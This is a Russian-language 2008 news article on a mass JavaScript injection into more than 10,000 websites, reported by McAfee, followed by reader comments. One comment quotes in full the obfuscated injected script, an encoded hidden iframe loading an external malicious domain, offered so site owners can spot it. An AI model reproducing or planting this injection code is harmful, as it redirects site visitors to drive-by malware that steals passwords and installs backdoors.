Китайские хакеры заразили более 10 тыс. веб-страниц

image

Теги: Китай, хакер, атака, McAfee

Список скомпрометированных веб-страниц включает туристические сайты, правительственные веб-ресурсы и сайты, посвященные хобби.

Более 10 тыс. веб-страниц были заражены вредоносной программой - это одна из самых крупных атак на сегодняшний день.

Список скомпрометированных веб-страниц включает туристические сайты, правительственные веб-ресурсы и сайты, посвященные хобби. На веб-ресурсах был размещен JavaScript-код, который перенаправляет посетителей на сайт, базирующийся в Китае и контролируемый хакерами.

Вредоносная программа пытается использовать уязвимость в Windows, RealPlayer, а также других приложениях с целью взлома ПК, согласно данным McAfee.

Компоненты вредоносной программы пытаются украсть пароли к онлайн-играм, а также уставить бэкдор для дальнейшей установки дополнительных вредоносных программ.

McAfee Avert Labs впервые обнаружила эту атаку 12 марта. Из 10 тыс. страниц, которые были скомпрометированы, часть уже очищена от вредоносного кода.

Атака, по предположениям ИБ-экспертов, произведена небольшой группировкой хакеров, базирующейся на севере Китая.


или введите имя

CAPTCHA
Страницы: 1  2  
1
14-03-2008 12:19:53
И мой сайт сволачи заразили
0 |
1
14-03-2008 12:41:16
ЛАМЕР!
0 |
1
14-03-2008 14:28:01
ламер ты. чайник тупой. учи терминологию.
0 |
1
14-03-2008 13:47:14
Потому что ты не предохранялся! И теперь твой писюк повис.
0 |
14-03-2008 12:55:28
А как можно проверить есть ли на сайте чтото левое в часности левый JavaScript-код
0 |
14-03-2008 14:43:49
Самое простое - вести мониторинг изменений.
0 |
1
14-03-2008 14:06:08
arkan Проверь на своем сайте различные index.php, index.html и т.д. и увидишь в конце файлов нечто вроде <script>document.write(unescape('%3c%69%66%72%61%6d%65%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%69%6d%70%75%6c%73%65%39%2e%6f%72%67%2f%27%20%77%69%64%74%68%3d%27%31%27%20%68%65%69%67%68%74%3d%27%31%27%20%73%74%79%6c%65%3d%27%76%69%73%69%62%69%6c%69%74%79%3a%20%68%69%64%64%65%6e%3b%27%3e%3c%2f%69%66%72%61%6d%65%3e'));</script><script>function v47cd98e200fde(v47cd98e201f75){ function v47cd98e202f14 () {var v47cd98e203eb8=16; return v47cd98e203eb8;} return(parseInt(v47cd98e201f75,v47cd98e202f14()));}function v47cd98e204e6c(v47cd98e205df5){ var v47cd98e208cd3=2; var v47cd98e206d9f='';for(v47cd98e207d3a=0; v47cd98e207d3a<v47cd98e205df5.length; v47cd98e207d3a+=v47cd98e208cd3){ v47cd98e206d9f+=(String.fromCharCode(v47cd98e200fde(v47cd98e205df5.substr(v47cd98e207d3a, v47cd98e208cd3))));}return v47cd98e206d9f;} document.write(v47cd98e204e6c('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D363534207372633D5C27687474703A2F2F75726C2F3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A313033353134292B276330663339396534305C272077696474683D373039206865696768743D313436207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E'));</script>
0 |
1
14-03-2008 14:57:58
не обязательно в конце. вот в новости про сайт белоруских вебманей так там тупо перед тэгом html было воткнуто и закодировано проще.
0 |
1
14-03-2008 16:54:37
Потому что у них информационная война с Китаем. Все подконтрольные госдепу и спецслужбам омереканские СМИ пишут под копирку одно и тоже.
0 |
я
14-03-2008 15:55:02
и почему о хакерах-китайцах кричат только омереканцы?..
0 |
1
14-03-2008 17:15:44
бле....Не туда ответил. Сюда надо.
0 |
1
14-03-2008 17:23:04
патомучто мы с ними за одно )
0 |
1
15-03-2008 06:03:05
Конечно, у нас просто иного выхода нет. Если будем против то огребём по самое не балуй.
0 |
1
14-03-2008 19:49:44
А сотни тысяч пользователей, этих сайтов, тоже уже очищены от вредоносного кода ?
0 |
1
14-03-2008 19:51:49
Этим же методом можно и лечить, а не только заражать )
0 |
Страницы: 1  2